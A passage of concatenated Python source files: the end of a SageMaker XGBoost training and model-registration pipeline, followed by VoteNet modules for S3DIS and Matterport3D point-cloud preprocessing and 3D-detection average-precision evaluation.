source='/opt/ml/processing/model', destination=model_path_param)]
code_path = os.path.join(BASE_DIR, 'dataprep/preprocess.py')
processing_step = ProcessingStep(
name='Processing',
code=code_path,
processor=sklearn_processor,
inputs=inputs,
outputs=outputs,
job_arguments=['--train-test-split-ratio', train_test_split_ratio_param]
)
# --------------------------
# Training Step
# --------------------------
hyperparameters = {
"max_depth": max_depth_param,
"eta": eta_param,
"gamma": gamma_param,
"min_child_weight": min_child_weight_param,
"silent": 0,
"objective": objective_param,
"num_round": num_round_param,
"eval_metric": eval_metric_param
}
entry_point = 'train.py'
source_dir = os.path.join(BASE_DIR, 'train/')
code_location = 's3://{0}/{1}/code'.format(bucket_name, prefix)
estimator = XGBoost(
entry_point=entry_point,
source_dir=source_dir,
output_path=output_path_param,
code_location=code_location,
hyperparameters=hyperparameters,
instance_type=training_instance_type_param,
instance_count=training_instance_count_param,
framework_version="0.90-2",
py_version="py3",
role=role
)
training_step = TrainingStep(
name='Training',
estimator=estimator,
inputs={
'train': TrainingInput(
s3_data=processing_step.properties.ProcessingOutputConfig.Outputs[
'train_data'
].S3Output.S3Uri,
content_type='text/csv'
),
'validation': TrainingInput(
s3_data=processing_step.properties.ProcessingOutputConfig.Outputs[
'val_data'
].S3Output.S3Uri,
content_type='text/csv'
)
}
)
# --------------------------
# Register Model Step
# --------------------------
code_location = 's3://{0}/{1}/code'.format(bucket_name, prefix)
sklearn_model = SKLearnModel(name='end-to-end-ml-sm-skl-model-{0}'.format(str(int(time.time()))),
model_data=processing_step.properties.ProcessingOutputConfig.Outputs[
'model'].S3Output.S3Uri,
entry_point='inference.py',
source_dir=os.path.join(BASE_DIR, 'deploy/sklearn/'),
code_location=code_location,
role=role,
sagemaker_session=sagemaker_session,
framework_version='0.20.0',
py_version='py3')
code_location = 's3://{0}/{1}/code'.format(bucket_name, prefix)
xgboost_model = XGBoostModel(name='end-to-end-ml-sm-xgb-model-{0}'.format(str(int(time.time()))),
model_data=training_step.properties.ModelArtifacts.S3ModelArtifacts,
entry_point='inference.py',
source_dir=os.path.join(BASE_DIR, 'deploy/xgboost/'),
code_location=code_location,
framework_version='0.90-2',
py_version='py3',
role=role,
sagemaker_session=sagemaker_session)
pipeline_model_name = 'end-to-end-ml-sm-xgb-skl-pipeline-{0}'.format(str(int(time.time())))
pipeline_model = PipelineModel(
name=pipeline_model_name,
role=role,
models=[
sklearn_model,
xgboost_model],
sagemaker_session=sagemaker_session)
register_model_step = RegisterModel(
name='RegisterModel',
content_types=['text/csv'],
response_types=['application/json', 'text/csv'],
inference_instances=[deploy_instance_type_param, 'ml.m5.large'],
transform_instances=['ml.c5.4xlarge'],
model_package_group_name=model_package_group_name,
approval_status=model_approval_status_param,
model=pipeline_model
)
# --------------------------
# Pipeline
# --------------------------
pipeline = Pipeline(
name=pipeline_name,
parameters=[
raw_data_path_param,
train_data_path_param,
val_data_path_param,
model_path_param,
processing_instance_type_param,
processing_instance_count_param,
train_test_split_ratio_param,
max_depth_param,
eta_param,
gamma_param,
min_child_weight_param,
objective_param,
num_round_param,
eval_metric_param,
training_instance_type_param,
training_instance_count_param,
output_path_param,
deploy_instance_type_param,
model_approval_status_param
],
steps=[processing_step, training_step, register_model_step],
sagemaker_session=sagemaker_session,
)
response = pipeline.upsert(role_arn=role)
print(response["PipelineArn"])
return pipeline
def run_pipeline(pipeline: Pipeline, parameters: dict) -> str:
"""
Runs the SM Pipeline.
:param pipeline: The SM Pipeline instance.
:param parameters: The pipeline execution parameters.
:return: The ARN of the registered model package.
"""
execution = pipeline.start(parameters)
execution.wait()
# Let's check the model package has been registered
steps = execution.list_steps()
register_model_step = next(s for s in steps if s['StepName'] == 'RegisterModel')
model_package_arn = register_model_step['Metadata']['RegisterModel']['Arn']
return model_package_arn
if __name__ == "__main__":
execution_role = sagemaker.get_execution_role()
session = sagemaker.Session()
bucket = session.default_bucket()
boto_session = boto3.session.Session()
region = boto_session.region_name
# Build pipeline.
end_to_end_pipeline = get_pipeline(region, None, execution_role, bucket)
# Set parameters.
execution_parameters = {
'train_test_split_ratio': '0.2'
}
# Run pipeline
model_package_version_arn = run_pipeline(end_to_end_pipeline, execution_parameters)
print(model_package_version_arn)
|
zaiweizhang/votenet | s3dis/model_util_s3dis.py | <gh_stars>1-10
# Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import numpy as np
import sys
import os
BASE_DIR = os.path.dirname(os.path.abspath(__file__))
sys.path.append(BASE_DIR)
ROOT_DIR = os.path.dirname(BASE_DIR)
sys.path.append(os.path.join(ROOT_DIR, 'utils'))
from box_util import get_3d_box
class S3disDatasetConfig(object):
def __init__(self):
self.num_class = 10#18
self.num_heading_bin = 1
self.num_size_cluster = 10#18
#self.type2class = {'cabinet':0, 'bed':1, 'chair':2, 'sofa':3, 'table':4, 'door':5,
# 'window':6,'bookshelf':7,'picture':8, 'counter':9, 'desk':10, 'curtain':11,
# 'refrigerator':12, 'showercurtrain':13, 'toilet':14, 'sink':15, 'bathtub':16, 'garbagebin':17}
#self.class2type = {13:'clutter', 4:'beam', 12:'board', 10:'bookcase', 1:'ceiling', 9:'chair', 5:'column', 7:'door', 2:'floor', 11:'sofa', 14:'stairs', 8:'table', 3:'wall', 6:'window'}
self.class2type = {9:'board', 7:'bookcase', 0:'ceiling', 6:'chair', 5:'column', 4:'door', 1:'floor', 8:'sofa', 5:'table', 2:'wall', 3:'window'}
#self.class2type = {self.type2class[t]:t for t in self.type2class}
self.type2class = {self.class2type[t]:t for t in self.class2type}
self.nyu40ids = np.array([1,2,3,6,7,8,9,10,11,12])
self.nyu40id2class = {nyu40id: i for i,nyu40id in enumerate(list(self.nyu40ids))}
#import pdb;pdb.set_trace()
self.mean_size_arr = np.load(os.path.join(ROOT_DIR,'s3dis/meta_data/s3dis_means.npy'))[self.nyu40ids-1,:]#['arr_0']
self.type_mean_size = {}
for i in range(self.num_size_cluster):
self.type_mean_size[self.class2type[i]] = self.mean_size_arr[i,:]
def angle2class(self, angle):
''' Convert continuous angle to discrete class
[optinal] also small regression number from
class center angle to current angle.
angle is from 0-2pi (or -pi~pi), class center at 0, 1*(2pi/N), 2*(2pi/N) ... (N-1)*(2pi/N)
return is class of int32 of 0,1,...,N-1 and a number such that
class*(2pi/N) + number = angle
NOT USED.
'''
assert(False)
def class2angle(self, pred_cls, residual, to_label_format=True):
''' Inverse function to angle2class.
As ScanNet only has axis-alined boxes so angles are always 0. '''
return 0
def size2class(self, size, type_name):
''' Convert 3D box size (l,w,h) to size class and size residual '''
size_class = self.type2class[type_name]
size_residual = size - self.type_mean_size[type_name]
return size_class, size_residual
def class2size(self, pred_cls, residual):
''' Inverse function to size2class '''
return self.mean_size_arr[pred_cls, :] + residual
def param2obb(self, center, heading_class, heading_residual, size_class, size_residual):
heading_angle = self.class2angle(heading_class, heading_residual)
box_size = self.class2size(int(size_class), size_residual)
obb = np.zeros((7,))
obb[0:3] = center
obb[3:6] = box_size
obb[6] = heading_angle*-1
return obb
def rotate_aligned_boxes(input_boxes, rot_mat):
centers, lengths = input_boxes[:,0:3], input_boxes[:,3:6]
new_centers = np.dot(centers, np.transpose(rot_mat))
dx, dy = lengths[:,0]/2.0, lengths[:,1]/2.0
new_x = np.zeros((dx.shape[0], 4))
new_y = np.zeros((dx.shape[0], 4))
for i, crnr in enumerate([(-1,-1), (1, -1), (1, 1), (-1, 1)]):
crnrs = np.zeros((dx.shape[0], 3))
crnrs[:,0] = crnr[0]*dx
crnrs[:,1] = crnr[1]*dy
crnrs = np.dot(crnrs, np.transpose(rot_mat))
new_x[:,i] = crnrs[:,0]
new_y[:,i] = crnrs[:,1]
new_dx = 2.0*np.max(new_x, 1)
new_dy = 2.0*np.max(new_y, 1)
new_lengths = np.stack((new_dx, new_dy, lengths[:,2]), axis=1)
return np.concatenate([new_centers, new_lengths], axis=1)
|
zaiweizhang/votenet | models/ap_helper.py | <filename>models/ap_helper.py<gh_stars>1-10
# Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
""" Helper functions and class to calculate Average Precisions for 3D object detection.
"""
import os
import sys
import numpy as np
import torch
BASE_DIR = os.path.dirname(os.path.abspath(__file__))
ROOT_DIR = os.path.dirname(BASE_DIR)
sys.path.append(os.path.join(ROOT_DIR, 'utils'))
from eval_det import eval_det_cls, eval_det_multiprocessing
from eval_det import get_iou_obb
from nms import nms_2d_faster, nms_3d_faster, nms_3d_faster_samecls
from box_util import get_3d_box
sys.path.append(os.path.join(ROOT_DIR, 'sunrgbd'))
from sunrgbd_utils import extract_pc_in_box3d
def flip_axis_to_camera(pc):
''' Flip X-right,Y-forward,Z-up to X-right,Y-down,Z-forward
Input and output are both (N,3) array
'''
pc2 = np.copy(pc)
pc2[...,[0,1,2]] = pc2[...,[0,2,1]] # cam X,Y,Z = depth X,-Z,Y
pc2[...,1] *= -1
return pc2
def flip_axis_to_depth(pc):
pc2 = np.copy(pc)
pc2[...,[0,1,2]] = pc2[...,[0,2,1]] # depth X,Y,Z = cam X,Z,-Y
pc2[...,2] *= -1
return pc2
def softmax(x):
''' Numpy function for softmax'''
shape = x.shape
probs = np.exp(x - np.max(x, axis=len(shape)-1, keepdims=True))
probs /= np.sum(probs, axis=len(shape)-1, keepdims=True)
return probs
def parse_predictions(end_points, config_dict):
""" Parse predictions to OBB parameters and suppress overlapping boxes
Args:
end_points: dict
{point_clouds, center, heading_scores, heading_residuals,
size_scores, size_residuals, sem_cls_scores}
config_dict: dict
{dataset_config, remove_empty_box, use_3d_nms, nms_iou,
use_old_type_nms, conf_thresh, per_class_proposal}
Returns:
batch_pred_map_cls: a list of len == batch size (BS)
[pred_list_i], i = 0, 1, ..., BS-1
where pred_list_i = [(pred_sem_cls, box_params, box_score)_j]
where j = 0, ..., num of valid detections - 1 from sample input i
"""
pred_center = end_points['center'] # B,num_proposal,3
pred_heading_class = torch.argmax(end_points['heading_scores'], -1) # B,num_proposal
pred_heading_residual = torch.gather(end_points['heading_residuals'], 2,
pred_heading_class.unsqueeze(-1)) # B,num_proposal,1
pred_heading_residual.squeeze_(2)
pred_size_class = torch.argmax(end_points['size_scores'], -1) # B,num_proposal
pred_size_residual = torch.gather(end_points['size_residuals'], 2,
pred_size_class.unsqueeze(-1).unsqueeze(-1).repeat(1,1,1,3)) # B,num_proposal,1,3
pred_size_residual.squeeze_(2)
pred_sem_cls = torch.argmax(end_points['sem_cls_scores'], -1) # B,num_proposal
sem_cls_probs = softmax(end_points['sem_cls_scores'].detach().cpu().numpy()) # B,num_proposal,10
pred_sem_cls_prob = np.max(sem_cls_probs,-1) # B,num_proposal
num_proposal = pred_center.shape[1]
# Since we operate in upright_depth coord for points, while util functions
# assume upright_camera coord.
bsize = pred_center.shape[0]
pred_corners_3d_upright_camera = np.zeros((bsize, num_proposal, 8, 3))
pred_center_upright_camera = flip_axis_to_camera(pred_center.detach().cpu().numpy())
for i in range(bsize):
for j in range(num_proposal):
heading_angle = config_dict['dataset_config'].class2angle(\
pred_heading_class[i,j].detach().cpu().numpy(), pred_heading_residual[i,j].detach().cpu().numpy())
box_size = config_dict['dataset_config'].class2size(\
int(pred_size_class[i,j].detach().cpu().numpy()), pred_size_residual[i,j].detach().cpu().numpy())
corners_3d_upright_camera = get_3d_box(box_size, heading_angle, pred_center_upright_camera[i,j,:])
pred_corners_3d_upright_camera[i,j] = corners_3d_upright_camera
K = pred_center.shape[1] # K==num_proposal
nonempty_box_mask = np.ones((bsize, K))
if config_dict['remove_empty_box']:
# -------------------------------------
# Remove predicted boxes without any point within them..
batch_pc = end_points['point_clouds'].cpu().numpy()[:,:,0:3] # B,N,3
for i in range(bsize):
pc = batch_pc[i,:,:] # (N,3)
for j in range(K):
box3d = pred_corners_3d_upright_camera[i,j,:,:] # (8,3)
box3d = flip_axis_to_depth(box3d)
pc_in_box,inds = extract_pc_in_box3d(pc, box3d)
if len(pc_in_box) < 5:
nonempty_box_mask[i,j] = 0
# -------------------------------------
obj_logits = end_points['objectness_scores'].detach().cpu().numpy()
obj_prob = softmax(obj_logits)[:,:,1] # (B,K)
if not config_dict['use_3d_nms']:
# ---------- NMS input: pred_with_prob in (B,K,7) -----------
pred_mask = np.zeros((bsize, K))
for i in range(bsize):
boxes_2d_with_prob = np.zeros((K,5))
for j in range(K):
boxes_2d_with_prob[j,0] = np.min(pred_corners_3d_upright_camera[i,j,:,0])
boxes_2d_with_prob[j,2] = np.max(pred_corners_3d_upright_camera[i,j,:,0])
boxes_2d_with_prob[j,1] = np.min(pred_corners_3d_upright_camera[i,j,:,2])
boxes_2d_with_prob[j,3] = np.max(pred_corners_3d_upright_camera[i,j,:,2])
boxes_2d_with_prob[j,4] = obj_prob[i,j]
nonempty_box_inds = np.where(nonempty_box_mask[i,:]==1)[0]
pick = nms_2d_faster(boxes_2d_with_prob[nonempty_box_mask[i,:]==1,:],
config_dict['nms_iou'], config_dict['use_old_type_nms'])
assert(len(pick)>0)
pred_mask[i, nonempty_box_inds[pick]] = 1
end_points['pred_mask'] = pred_mask
# ---------- NMS output: pred_mask in (B,K) -----------
elif config_dict['use_3d_nms'] and (not config_dict['cls_nms']):
# ---------- NMS input: pred_with_prob in (B,K,7) -----------
pred_mask = np.zeros((bsize, K))
for i in range(bsize):
boxes_3d_with_prob = np.zeros((K,7))
for j in range(K):
boxes_3d_with_prob[j,0] = np.min(pred_corners_3d_upright_camera[i,j,:,0])
boxes_3d_with_prob[j,1] = np.min(pred_corners_3d_upright_camera[i,j,:,1])
boxes_3d_with_prob[j,2] = np.min(pred_corners_3d_upright_camera[i,j,:,2])
boxes_3d_with_prob[j,3] = np.max(pred_corners_3d_upright_camera[i,j,:,0])
boxes_3d_with_prob[j,4] = np.max(pred_corners_3d_upright_camera[i,j,:,1])
boxes_3d_with_prob[j,5] = np.max(pred_corners_3d_upright_camera[i,j,:,2])
boxes_3d_with_prob[j,6] = obj_prob[i,j]
nonempty_box_inds = np.where(nonempty_box_mask[i,:]==1)[0]
pick = nms_3d_faster(boxes_3d_with_prob[nonempty_box_mask[i,:]==1,:],
config_dict['nms_iou'], config_dict['use_old_type_nms'])
assert(len(pick)>0)
pred_mask[i, nonempty_box_inds[pick]] = 1
end_points['pred_mask'] = pred_mask
# ---------- NMS output: pred_mask in (B,K) -----------
elif config_dict['use_3d_nms'] and config_dict['cls_nms']:
# ---------- NMS input: pred_with_prob in (B,K,8) -----------
pred_mask = np.zeros((bsize, K))
for i in range(bsize):
boxes_3d_with_prob = np.zeros((K,8))
for j in range(K):
boxes_3d_with_prob[j,0] = np.min(pred_corners_3d_upright_camera[i,j,:,0])
boxes_3d_with_prob[j,1] = np.min(pred_corners_3d_upright_camera[i,j,:,1])
boxes_3d_with_prob[j,2] = np.min(pred_corners_3d_upright_camera[i,j,:,2])
boxes_3d_with_prob[j,3] = np.max(pred_corners_3d_upright_camera[i,j,:,0])
boxes_3d_with_prob[j,4] = np.max(pred_corners_3d_upright_camera[i,j,:,1])
boxes_3d_with_prob[j,5] = np.max(pred_corners_3d_upright_camera[i,j,:,2])
boxes_3d_with_prob[j,6] = obj_prob[i,j]
boxes_3d_with_prob[j,7] = pred_sem_cls[i,j] # only suppress if the two boxes are of the same class!!
nonempty_box_inds = np.where(nonempty_box_mask[i,:]==1)[0]
pick = nms_3d_faster_samecls(boxes_3d_with_prob[nonempty_box_mask[i,:]==1,:],
config_dict['nms_iou'], config_dict['use_old_type_nms'])
assert(len(pick)>0)
pred_mask[i, nonempty_box_inds[pick]] = 1
end_points['pred_mask'] = pred_mask
# ---------- NMS output: pred_mask in (B,K) -----------
batch_pred_map_cls = [] # a list (len: batch_size) of list (len: num of predictions per sample) of tuples of pred_cls, pred_box and conf (0-1)
for i in range(bsize):
if config_dict['per_class_proposal']:
cur_list = []
for ii in range(config_dict['dataset_config'].num_class):
cur_list += [(ii, pred_corners_3d_upright_camera[i,j], sem_cls_probs[i,j,ii]*obj_prob[i,j]) \
for j in range(pred_center.shape[1]) if pred_mask[i,j]==1 and obj_prob[i,j]>config_dict['conf_thresh']]
batch_pred_map_cls.append(cur_list)
else:
batch_pred_map_cls.append([(pred_sem_cls[i,j].item(), pred_corners_3d_upright_camera[i,j], obj_prob[i,j]) \
for j in range(pred_center.shape[1]) if pred_mask[i,j]==1 and obj_prob[i,j]>config_dict['conf_thresh']])
end_points['batch_pred_map_cls'] = batch_pred_map_cls
return batch_pred_map_cls
def parse_groundtruths(end_points, config_dict):
""" Parse groundtruth labels to OBB parameters.
Args:
end_points: dict
{center_label, heading_class_label, heading_residual_label,
size_class_label, size_residual_label, sem_cls_label,
box_label_mask}
config_dict: dict
{dataset_config}
Returns:
batch_gt_map_cls: a list of len == batch_size (BS)
[gt_list_i], i = 0, 1, ..., BS-1
where gt_list_i = [(gt_sem_cls, gt_box_params)_j]
where j = 0, ..., num of objects - 1 at sample input i
"""
center_label = end_points['center_label']
heading_class_label = end_points['heading_class_label']
heading_residual_label = end_points['heading_residual_label']
size_class_label = end_points['size_class_label']
size_residual_label = end_points['size_residual_label']
box_label_mask = end_points['box_label_mask']
sem_cls_label = end_points['sem_cls_label']
bsize = center_label.shape[0]
K2 = center_label.shape[1] # K2==MAX_NUM_OBJ
gt_corners_3d_upright_camera = np.zeros((bsize, K2, 8, 3))
gt_center_upright_camera = flip_axis_to_camera(center_label[:,:,0:3].detach().cpu().numpy())
for i in range(bsize):
for j in range(K2):
if box_label_mask[i,j] == 0: continue
heading_angle = config_dict['dataset_config'].class2angle(heading_class_label[i,j].detach().cpu().numpy(), heading_residual_label[i,j].detach().cpu().numpy())
box_size = config_dict['dataset_config'].class2size(int(size_class_label[i,j].detach().cpu().numpy()), size_residual_label[i,j].detach().cpu().numpy())
corners_3d_upright_camera = get_3d_box(box_size, heading_angle, gt_center_upright_camera[i,j,:])
gt_corners_3d_upright_camera[i,j] = corners_3d_upright_camera
batch_gt_map_cls = []
for i in range(bsize):
batch_gt_map_cls.append([(sem_cls_label[i,j].item(), gt_corners_3d_upright_camera[i,j]) for j in range(gt_corners_3d_upright_camera.shape[1]) if box_label_mask[i,j]==1])
end_points['batch_gt_map_cls'] = batch_gt_map_cls
return batch_gt_map_cls
class APCalculator(object):
''' Calculating Average Precision '''
def __init__(self, ap_iou_thresh=0.25, class2type_map=None):
"""
Args:
ap_iou_thresh: float between 0 and 1.0
IoU threshold to judge whether a prediction is positive.
class2type_map: [optional] dict {class_int:class_name}
"""
self.ap_iou_thresh = ap_iou_thresh
self.class2type_map = class2type_map
self.reset()
def step(self, batch_pred_map_cls, batch_gt_map_cls):
""" Accumulate one batch of prediction and groundtruth.
Args:
batch_pred_map_cls: a list of lists [[(pred_cls, pred_box_params, score),...],...]
batch_gt_map_cls: a list of lists [[(gt_cls, gt_box_params),...],...]
should have the same length with batch_pred_map_cls (batch_size)
"""
bsize = len(batch_pred_map_cls)
assert(bsize == len(batch_gt_map_cls))
for i in range(bsize):
self.gt_map_cls[self.scan_cnt] = batch_gt_map_cls[i]
self.pred_map_cls[self.scan_cnt] = batch_pred_map_cls[i]
self.scan_cnt += 1
def compute_metrics(self):
""" Use accumulated predictions and groundtruths to compute Average Precision.
"""
rec, prec, ap = eval_det_multiprocessing(self.pred_map_cls, self.gt_map_cls, ovthresh=self.ap_iou_thresh, get_iou_func=get_iou_obb)
ret_dict = {}
for key in sorted(ap.keys()):
clsname = self.class2type_map[key] if self.class2type_map else str(key)
ret_dict['%s Average Precision'%(clsname)] = ap[key]
temp = []
for v in list(ap.values()):
if np.isnan(v):
continue
temp.append(v)
ret_dict['mAP'] = np.mean(temp)
rec_list = []
for key in sorted(ap.keys()):
clsname = self.class2type_map[key] if self.class2type_map else str(key)
try:
ret_dict['%s Recall'%(clsname)] = rec[key][-1]
rec_list.append(rec[key][-1])
except:
ret_dict['%s Recall'%(clsname)] = 0
rec_list.append(0)
temp = []
for v in rec_list:
if np.isnan(v):
continue
temp.append(v)
ret_dict['AR'] = np.mean(temp)
return ret_dict
def reset(self):
self.gt_map_cls = {} # {scan_id: [(classname, bbox)]}
self.pred_map_cls = {} # {scan_id: [(classname, bbox, score)]}
self.scan_cnt = 0
|
zaiweizhang/votenet | s3dis/process_data.py | import numpy as np
import os
import sys
sys.path.append('../utils')
from pc_util import *
from multiprocessing import Pool
data_path = 'Path/to/Stanford3dDataset_v1.2_Aligned_Version'
out_path = 'Path/to/output_dir'
if not os.path.exists(out_path):
os.makedirs(out_path)
area_names = ['Area_1', 'Area_2', 'Area_3', 'Area_4', 'Area_5', 'Area_6']
sem_map = {'ceiling':0, 'floor':1, 'wall':2, 'column':3,'beam':4, 'window':5, 'door':6,
'table':7, 'chair':8, 'bookcase':9, 'sofa':10, 'board':11, 'clutter':12, 'stair':13}
def process_one_room(name_pair):
area_name, room_name = name_pair.split('-')
if os.path.exists(os.path.join(out_path, area_name+'_'+room_name+'_all_noangle.npy')):
print('exists')
return
if not os.path.exists(os.path.join(data_path, area_name, room_name, room_name+'.txt')):
return
room_pt = np.loadtxt(os.path.join(data_path, area_name, room_name, room_name+'.txt'))
#print(room_pt.shape)
inds = np.random.choice(room_pt.shape[0], 50000)
pt = room_pt[inds]
# write_ply(pt[:,0:3], 'hh.ply')
room_center = np.zeros((pt.shape[0], 3))
room_size = np.zeros((pt.shape[0], 3))
room_angle = np.zeros((pt.shape[0],1))
room_ins = np.zeros((pt.shape[0],1))
room_sem = np.zeros((pt.shape[0],1))
print('start', area_name, room_name)
for i, ins_name in enumerate(os.listdir(os.path.join(data_path, area_name, room_name, 'Annotations'))):
print('{}/{}'.format(i, len(os.listdir(os.path.join(data_path, area_name, room_name, 'Annotations')))), area_name, room_name, ins_name)
if not os.path.exists(os.path.join(data_path, area_name, room_name, 'Annotations', ins_name)):
print('not exists', ins_name)
continue
#print(ins_name)
sem_name = ins_name.split('_')[0]
sem_label = sem_map[sem_name]
ins_label = i
ins_pt = np.loadtxt(os.path.join(data_path, area_name, room_name, 'Annotations', ins_name))[:,0:3]
x_min, y_min, z_min = ins_pt.min(0)
x_max, y_max, z_max = ins_pt.max(0)
size = np.array([x_max-x_min, y_max-y_min, z_max-z_min])
center = np.array([x_max/2+x_min/2, y_max/2+y_min/2, z_max/2+z_min/2])
ins_inds = []
for j in range(ins_pt.shape[0]):
dis = np.sum(np.square(ins_pt[j]-pt[:,0:3]),axis=1)
min_dis = dis.min()
min_ind = np.argmin(dis)
if min_dis<1e-3:
ins_inds.append(min_ind)
room_center[ins_inds] = center
room_size[ins_inds] = size
room_ins[ins_inds] = ins_label+1
room_sem[ins_inds] = sem_label+1
print('prepare to save', area_name, room_name)
res = np.concatenate((room_center, room_size, room_angle, room_ins, room_sem), axis=1)
np.save(os.path.join(out_path, area_name+'_'+room_name+'_pt.npy'), pt)
np.save(os.path.join(out_path, area_name+'_'+room_name+'_all_noangle.npy'), res)
print('save', area_name, room_name)
'''
write_ply_color(pt[:,0:3], room_sem[:,0].astype(np.int32), 'test/'+area_name+'_'+room_nam
e+'_sem.ply')
write_ply_color(pt[:,0:3], room_ins[:,0], 'test/'+area_name+'_'+room_name+'_ins.ply')
centers = np.unique(room_center, axis=0)
#centers = centers[np.sum(np.square(centers))>0]
new_pt = np.concatenate((pt[:,0:3], centers), axis=0)
colors = np.zeros(new_pt.shape[0])
colors[pt.shape[0]:]=1
write_ply_color(new_pt, colors, 'test/'+area_name+'_'+room_name+'_center.ply')
print('save')
'''
if __name__=="__main__":
name_pairs = []
for area_name in area_names:
for room_name in os.listdir(os.path.join(data_path, area_name)):
name_pairs.append(area_name+'-'+room_name)
#process_one_room(area_name+'-'+room_name)
p = Pool(12)
p.map(process_one_room, name_pairs)
|
zaiweizhang/votenet | mp3d/process_matterport.py | import numpy as np
import os
from plyfile import PlyData, PlyElement
import json
import sys
import csv
from matplotlib import cm
def read_mesh_vertices_rgb(filename):
""" read XYZ RGB for each vertex.
Note: RGB values are in 0-255
"""
assert os.path.isfile(filename)
with open(filename, 'rb') as f:
plydata = PlyData.read(f)
num_verts = plydata['vertex'].count
vertices = np.zeros(shape=[num_verts, 6], dtype=np.float32)
vertices[:,0] = plydata['vertex'].data['x']
vertices[:,1] = plydata['vertex'].data['y']
vertices[:,2] = plydata['vertex'].data['z']
vertices[:,3] = plydata['vertex'].data['red']
vertices[:,4] = plydata['vertex'].data['green']
vertices[:,5] = plydata['vertex'].data['blue']
return vertices
def write_mesh_vertices_rgb(filename, out_name, colors):
""" read XYZ RGB for each vertex.
Note: RGB values are in 0-255
"""
with open(filename, 'rb') as f:
plydata = PlyData.read(f)
num_verts = plydata['vertex'].count
plydata['vertex'].data['red'] = colors[:,0]
plydata['vertex'].data['green'] = colors[:,1]
plydata['vertex'].data['blue'] = colors[:,2]
plydata.write(out_name)
def read_aggregation(filename):
assert os.path.isfile(filename)
object_id_to_segs = {}
label_to_segs = {}
with open(filename) as f:
data = json.load(f)
num_objects = len(data['segGroups'])
for i in range(num_objects):
object_id = data['segGroups'][i]['objectId'] + 1 # instance ids should be 1-indexed
label = data['segGroups'][i]['label']
segs = data['segGroups'][i]['segments']
object_id_to_segs[object_id] = segs
if label in label_to_segs:
label_to_segs[label].extend(segs)
else:
label_to_segs[label] = segs
return object_id_to_segs, label_to_segs
def read_segmentation(filename):
assert os.path.isfile(filename)
seg_to_verts = {}
with open(filename) as f:
data = json.load(f)
num_verts = len(data['segIndices'])
for i in range(num_verts):
seg_id = data['segIndices'][i]
if seg_id in seg_to_verts:
seg_to_verts[seg_id].append(i)
else:
seg_to_verts[seg_id] = [i]
return seg_to_verts, num_verts
def represents_int(s):
''' if string s represents an int. '''
try:
int(s)
return True
except ValueError:
return False
def read_label_mapping(filename, label_from='raw_category', label_to='nyu40id'):
assert os.path.isfile(filename)
mapping = dict()
with open(filename) as csvfile:
reader = csv.DictReader(csvfile, delimiter='\t')
for row in reader:
if row[label_from]=='' or row[label_to]=='':
continue
mapping[row[label_from]] = int(row[label_to])
if represents_int(list(mapping.keys())[0]):
mapping = {int(k):v for k,v in mapping.items()}
return mapping
data_path = 'scans'
out_path = 'ours'
if not os.path.exists(out_path):
os.makedirs(out_path)
LABEL_MAP_FILE = '/home/bo/data/matterport3d/Matterport/metadata/category_mapping.tsv'
label_map = read_label_mapping(LABEL_MAP_FILE,
label_from='raw_category', label_to='nyu40id')
for house_name in os.listdir(data_path):
if len(house_name) != 11:
continue
for tmp_name in os.listdir(os.path.join(data_path, house_name, 'region_segmentations')):
if not tmp_name.endswith('.ply'):
continue
region_name = tmp_name[:-4]
print(house_name, region_name)
"""
output_file = '{}/{}_{}'.format(out_path, house_name, region_name)
if os.path.exists(output_file+'_vert.npy'):
continue
"""
mesh_vertices = read_mesh_vertices_rgb(os.path.join(data_path,house_name, 'region_segmentations', region_name+'.ply'))
fseg_filename = os.path.join(data_path, house_name, 'region_segmentations', region_name+'.fsegs.json')
vseg_filename = os.path.join(data_path, house_name, 'region_segmentations', region_name+'.vsegs.json')
semseg_filename = os.path.join(data_path, house_name, 'region_segmentations', region_name+'.semseg.json')
with open(semseg_filename) as f:
try:
data = json.load(f)
except:
print('bad json file', semseg_filename)
continue
with open(vseg_filename) as f:
try:
data = json.load(f)
except:
print('bad json file', vseg_filename)
continue
object_id_to_segs, label_to_segs = read_aggregation(semseg_filename)
seg_to_verts, num_verts = read_segmentation(vseg_filename)
label_ids = np.zeros(shape=(num_verts), dtype=np.uint32) # 0: unannotated
object_id_to_label_id = {}
flag = 0
for label, segs in label_to_segs.items():
if label not in label_map:
flag = 1
break
label_id = label_map[label]
for seg in segs:
if not seg in seg_to_verts.keys():
continue
verts = seg_to_verts[seg]
label_ids[verts] = label_id
if flag == 1:
print ("issues with", house_name, region_name)
continue
instance_ids = np.zeros(shape=(num_verts), dtype=np.uint32) # 0: unannotated
num_instances = len(np.unique(list(object_id_to_segs.keys())))
for object_id, segs in object_id_to_segs.items():
for seg in segs:
if not seg in seg_to_verts.keys():
continue
verts = seg_to_verts[seg]
instance_ids[verts] = object_id
if object_id not in object_id_to_label_id:
object_id_to_label_id[object_id] = label_ids[verts][0]
instance_bboxes = np.zeros((num_instances,7))
for obj_id in object_id_to_segs:
label_id = object_id_to_label_id[obj_id]
obj_pc = mesh_vertices[instance_ids==obj_id, 0:3]
if len(obj_pc) == 0: continue
xmin = np.min(obj_pc[:,0])
ymin = np.min(obj_pc[:,1])
zmin = np.min(obj_pc[:,2])
xmax = np.max(obj_pc[:,0])
ymax = np.max(obj_pc[:,1])
zmax = np.max(obj_pc[:,2])
bbox = np.array([(xmin+xmax)/2, (ymin+ymax)/2, (zmin+zmax)/2,
xmax-xmin, ymax-ymin, zmax-zmin, label_id])
# NOTE: this assumes obj_id is in 1,2,3,.,,,.NUM_INSTANCES
instance_bboxes[obj_id-1,:] = bbox
output_file = '{}/{}_{}'.format(out_path, house_name, region_name)
"""
c = label_ids.astype(np.float32)/label_ids.max()
cmap=cm.get_cmap('rainbow')
colors = cmap(c)[:,0:3]*255.0
write_mesh_vertices_rgb(os.path.join(data_path,house_name, 'region_segmentations', region_name+'.ply'),
output_file+'_sem.ply', colors)
c = instance_ids.astype(np.float32)/instance_ids.max()
cmap=cm.get_cmap('rainbow')
colors = cmap(c)[:,0:3]*255.0
write_mesh_vertices_rgb(os.path.join(data_path,house_name, 'region_segmentations', region_name+'.ply'),
output_file+'_ins.ply', colors)
"""
np.save(output_file+'_vert.npy', mesh_vertices)
np.save(output_file+'_sem_label.npy', label_ids)
np.save(output_file+'_ins_label.npy', instance_ids)
np.save(output_file+'_bbox.npy', instance_bboxes)
# with open(fseg_filename) as f:
# data = json.load(f)
# fseg_ids = data['segIndices']
